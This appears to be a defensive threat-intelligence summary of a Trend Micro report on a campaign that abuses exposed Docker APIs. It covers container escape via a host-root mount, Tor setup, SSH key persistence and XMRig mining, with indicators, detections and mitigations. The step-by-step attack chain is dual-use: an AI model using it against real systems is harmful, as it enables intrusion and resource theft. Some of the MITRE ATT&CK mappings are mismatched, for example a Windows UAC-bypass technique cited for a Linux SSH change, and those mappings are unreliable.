Full Report
Misconfigured Docker instances are the target of a campaign that employs the Tor anonymity network to stealthily mine cryptocurrency in susceptible environments. "Attackers are exploiting misconfigured Docker APIs to gain access to containerized environments, then using Tor to mask their activities while deploying crypto miners," Trend Micro researchers Sunil Bharti and Shubham Singh said in an
Analysis Summary
# Tool/Technique: Cryptojacking via Exposed Docker APIs utilizing Tor
## Overview
This describes a cryptojacking campaign where threat actors exploit misconfigured Docker APIs to gain unauthorized access to containerized environments. The primary goals are to deploy XMRig cryptocurrency miners and leverage the Tor network to anonymize their command-and-control (C2) activities and execution.
## Technical Details
- Type: Tool/Technique (Exploitation and Campaign)
- Platform: Linux/Containerized environments (Docker)
- Capabilities: Container escape, Tor anonymization, persistent backdoors via SSH modification, C2 beaconing, cryptocurrency mining.
- First Seen: Information pertains to an analysis published "last week" relative to the article date (June 24, 2025).
## MITRE ATT&CK Mapping
- TA0011 - Command and Control
- T1071 - Application Layer Protocol
- T1071.001 - Web Protocols
- TA0001 - Initial Access
- T1190 - Exploit Public-Facing Application (Exploiting misconfigured Docker API)
- TA0003 - Persistence
- T1548.002 - Bypass User Account Control (via modifying host system configurations to establish persistence)
- TA0005 - Defense Evasion
- T1027 - Obfuscated Files or Information (Use of Base64 encoded scripts)
- T1090 - Proxy
- T1090.003 - Proxy: Multi-hop Proxy (Implied use of Tor for connection routing)
- TA0008 - Lateral Movement
- T1572 - Protocol Tunneling (Using SOCKS5H through Tor)
## Functionality
### Core Capabilities
- **Container Access & Enumeration:** Initial access via exploiting public-facing Docker API, then listing existing containers (`ContainerList`).
- **Container Creation and Escapes:** Creating a new container from the `alpine` image, crucially mounting the host's root directory (`/hostroot` mapped to `/`) as a volume, enabling container escape and host file system modification.
- **Anonymization Setup:** Installing Tor via a Base64-encoded shell script executed during container creation.
- **Traffic Anonymization:** Configuring all traffic and DNS resolution through Tor using the `socks5h` proxy configuration within the Tor setup.
- **Persistence Mechanism:** Executing `docker-init.sh` to modify the host's SSH configuration (`~/.ssh/authorized_keys`) to enable root login and add an attacker-controlled SSH key.
- **Malware Delivery:** Fetching and executing a remote script from a `.onion` domain to deliver the final payload.
### Advanced Features
- **Cryptomining Payload:** Downloading and configuring the XMRig cryptocurrency miner, supplied with wallet addresses and mining pool URLs.
- **Tool Deployment:** Installation of reconnaissance and networking tools like `masscan` and `libpcap` within the compromised container.
- **C2 Beaconing:** Reporting system infection details back to the C&C server.
## Indicators of Compromise
- File Hashes: [Not explicitly provided in the summary text]
- File Names: `docker-init.sh`
- Registry Keys: [Not applicable/provided for Linux container context]
- Network Indicators:
- Initial Access IP: `198.199.72[.]27`
- C2/Delivery `.onion` Domain: `wtxqf54djhp5pskv2lfyduub5ievxbyvlzjgjopk6hxge5umombr63ad[.]onion`
- Behavioral Indicators:
- Docker API request to list containers.
- Container creation mounting `/hostroot` (host root directory) as a volume.
- Modification of SSH configuration files (`~/.ssh/authorized_keys`) on the host system.
- Outbound traffic routed via `socks5h` protocol.
## Associated Threat Actors
- [Unnamed threat actors, general description used by Trend Micro researchers.]
## Detection Methods
- Signature-based detection: Signatures for the XMRig binary, or known C2 infrastructure hashes (if available).
- Behavioral detection: Monitoring Docker daemon logs for suspicious calls, specifically container creation that mounts sensitive host paths (like `/`). Detection of Tor installation commands or unusual process execution within containers.
- YARA rules: [Not explicitly available in the summary text]
## Mitigation Strategies
- **Docker Configuration Hardening:** Ensure Docker APIs are not exposed publicly or are properly secured using authentication mechanisms (TLS).
- **Principle of Least Privilege:** Restrict container privileges and avoid mounting host root directories (`/`) as volumes unless absolutely necessary and thoroughly audited.
- **Network Segmentation:** Isolate container infrastructure to limit the blast radius if an escape occurs.
- **Disable Unnecessary Services:** If SSH root login is not required, maintain strong controls over SSH configuration files.
- **Monitor Process Execution:** Implement runtime security monitoring to detect the execution of network tools (`masscan`, `libpcap`) or cryptographic miner processes (XMRig) within containers.
## Related Tools/Techniques
- Cryptojacking tools (e.g., XMRig)
- Container Escape techniques (similar to mounting sensitive host paths)
- Use of Tor for C2 infrastructure obfuscation.